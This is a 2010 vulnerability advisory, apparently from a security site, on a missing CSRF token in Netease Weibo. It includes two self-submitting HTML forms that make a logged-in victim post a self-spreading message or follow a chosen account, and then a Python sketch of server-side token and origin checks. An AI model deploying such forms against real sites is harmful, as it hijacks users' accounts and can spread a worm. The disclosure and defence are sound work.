Netease Weibo CSRF: two ways to exploit it - Vulnerability warning - Black Bar Security Net

2010-11-01T00:00:00
ID MYHACK58:62201028231
Type myhack58
Reporter Anonymous
Modified 2010-11-01T00:00:00

Description

The site does not perform token validation, so it is vulnerable to CSRF attacks.

Detailed description:

A malicious attacker may construct a malicious form and trick victims into clicking a link to it. When a victim clicks the link, a microblog message is posted on the victim's behalf. This method can be used to create a worm, which is very serious.

Vulnerability proof:

Test method:

1. Save the following form as index.html and put it in a local directory, replacing 183.174.39.46 with your own IP.

    <form name="CSRF" method="POST" name="form0" action="http://t.163.com:80/statuses/update.do">
    <input type="hidden" name="status" value="http://183.174.39.46/index.html"/>
    <input type="hidden" name="in_reply_to_status_id" value="sendinfo"/>
    <input type="hidden" name="dispatchToFollowers" value=""/>
    </form>
    <script>
    document.CSRF.submit();
    </script>

2. Log in to Netease Weibo, then visit http://183.174.39.46/index.html

3. Go back to your own page, http://t.163.com/, and you will find that one more microblog message has been posted.

4. If the people who follow you click on that message, they will post a similar microblog message.

Second, Netease Weibo CSRF exploit 2: automatically follow a user and automatically post a message

Yesterday I treated the problem as too simple, and today I tried it: this Netease Weibo CSRF vulnerability can also be used to add a follow automatically. Combined with yesterday's auto-post function, the two together make for a very interesting thing. This issue is too serious; I could not help thinking of sending it out as a 0day, but in view of National Day, you think about it and you feel good.

Detailed description:

After logging in, visit the constructed form and “small pan head” is added to the accounts you follow.

Vulnerability proof:

    <form method="POST" name="CSRF" action="http://t.163.com:80/friendships/create/3198225089.json">
    <input type="hidden" name="name" value="value"/>
    </form>
    <script>
    document.CSRF.submit();
    </script>
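The token validation this advisory says is missing, sketched as a server-side check that rejects both forged forms above. This is an added example, not Netease's code or the reporter's: the `csrf_token` field name, the server key, the allowed-origin list and the session id are assumptions, and the sample requests are constructed from the two forms in the advisory.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed values for this sketch (not taken from t.163.com).
SERVER_KEY = secrets.token_bytes(32)
ALLOWED_ORIGINS = {("http", "t.163.com"), ("https", "t.163.com")}

def issue_token(session_id: str) -> str:
    """Token the site embeds in every form it renders for this session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def same_site(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is ours."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed on state-changing requests
    parts = urlsplit(source)
    return (parts.scheme, parts.hostname) in ALLOWED_ORIGINS

def check_request(method: str, headers: dict, form: dict, session_id: str) -> tuple:
    """Return (allowed, reason) for a request that carries a valid session cookie."""
    if method.upper() in {"GET", "HEAD", "OPTIONS"}:
        return True, "safe method"
    if not same_site(headers):
        return False, "cross-site or missing origin"
    sent = form.get("csrf_token", "").encode()
    expected = issue_token(session_id).encode()
    if not hmac.compare_digest(sent, expected):  # constant-time comparison
        return False, "missing or wrong token"
    return True, "ok"

# Constructed sample requests; the two forged ones mirror the advisory's forms.
SESSION = "constructed-session-id"
FORGED_POST = ("POST", {"Origin": "http://183.174.39.46"},
               {"status": "http://183.174.39.46/index.html",
                "in_reply_to_status_id": "sendinfo", "dispatchToFollowers": ""})
FORGED_FOLLOW = ("POST", {"Referer": "http://183.174.39.46/index.html"},
                 {"name": "value"})
GENUINE_POST = ("POST", {"Origin": "http://t.163.com"},
                {"status": "hello", "csrf_token": issue_token(SESSION)})

if __name__ == "__main__":
    for request in (FORGED_POST, FORGED_FOLLOW, GENUINE_POST):
        print(request[1], check_request(*request, SESSION))
```

The token check is what stops a forged form even when the origin headers look acceptable, because the attacker's page cannot read the per-session token out of the victim's pages.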